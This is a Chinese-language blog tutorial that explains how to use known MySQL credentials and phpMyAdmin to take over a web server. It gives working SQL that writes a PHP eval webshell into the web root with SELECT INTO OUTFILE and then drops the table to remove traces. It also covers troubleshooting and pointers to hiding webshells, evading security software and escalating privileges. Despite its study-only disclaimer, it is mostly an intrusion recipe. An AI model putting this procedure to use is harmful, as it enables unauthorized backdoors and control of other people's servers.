已知SQL密码利用PhpMyAdmin渗透

免责声明:本站所发布的一切应用和网络工具及分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。

本文适用于已知目标服务器SQL可执行SQL语句的账户及其密码的情况下,通过使用其安装的PhpMyAdmin进行上传木马,以取得目标服务器控制权。

0x00名词解释

phpMyAdmin

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。详见《PHPMyAdmin》

0x01 所需工具

  • 目标服务器SQL可执行SQL语句的账户及其密码(如默认root)。
  • 目标服务器已被安装PhpMyAdmin,且可以访问。
  • 一套WebShell:一句话木马(本文使用 中国菜刀 );大马(本文使用 PHPmofshell )。更多木马的利弊分析推荐可见 《网站木马的使用》
  • 可以用于访问WebShell的目标服务器放置位置的绝对位置(如网站文件夹)。
  • 如果已知SQL可执行SQL语句的账户及其密码但没有PhpMyAdmin的话,可以通过远程连接进行执行,本文篇幅有限,不在此阐述。

0x02 安装小马

1.使用中国菜刀新建一句话木马。

详见《中国菜刀》

2.访问目标PhpMyAdmin并登陆。

PhpMyAdmin登陆界面
PhpMyAdmin登陆界面

3.进入任意数据库。

左侧是全部数据库列表
左侧是全部数据库列表

4.打开SQL语句执行页面。

点击上方进入SQL操作台
点击上方进入SQL操作台

5.输入以下SQL语句:

Create TABLE a213 (cmd text NOT NULL);  --a213为要新建的数据库名称,可任意更改。
Insert INTO a213 (cmd) VALUES('<?php @eval($_POST[citg]);?>');  --citg为一句话木马的密码,请以第一步为准。
select cmd from a213 into outfile 'E:/WWW/1ndex.php'; --E:/WWW/1ndex.php为保存位置和名称,需要使用可用于访问的目标服务器的绝对位置。
Drop TABLE IF EXISTS a213;  --清理痕迹,删除新建的数据库
  • 注:CITG是本文成文时首发位置,该团队已解散,发布的博客已不存在。
  • 如果想深入了解或者灵活修改,可见《SQL知识库》

推荐阅读:《如何合理放置木马才不会被发现?》

如图:

例子
例子

6.点击执行,如果执行成功会出现如图提示:

执行成功
执行成功

也可能会出现如下报错:

(1)出现该错误请尝试将数据库表名(上文中a123)换成其他的。

#1050错误
1050错误

(2)出现该错误请尝试核对绝对路径。

#1报错
1报错

(3)其他错误请检查你的语法,是否输入错误。

7.尝试访问你的小马(一句话木马)路径,如果是空白而不是各种错误的话即可进行下一步,否则请重新操作。

推荐阅读《如果对方服务器安装了安全狗或者网站卫士造成我不能连接一句话怎么办? 》

提权成功!

接下来打开小马管理软件,上传大马进行提权即可获得管理员权限,任意修改网站甚至登陆服务器,详见本站《网站木马的使用》

点赞

    发表评论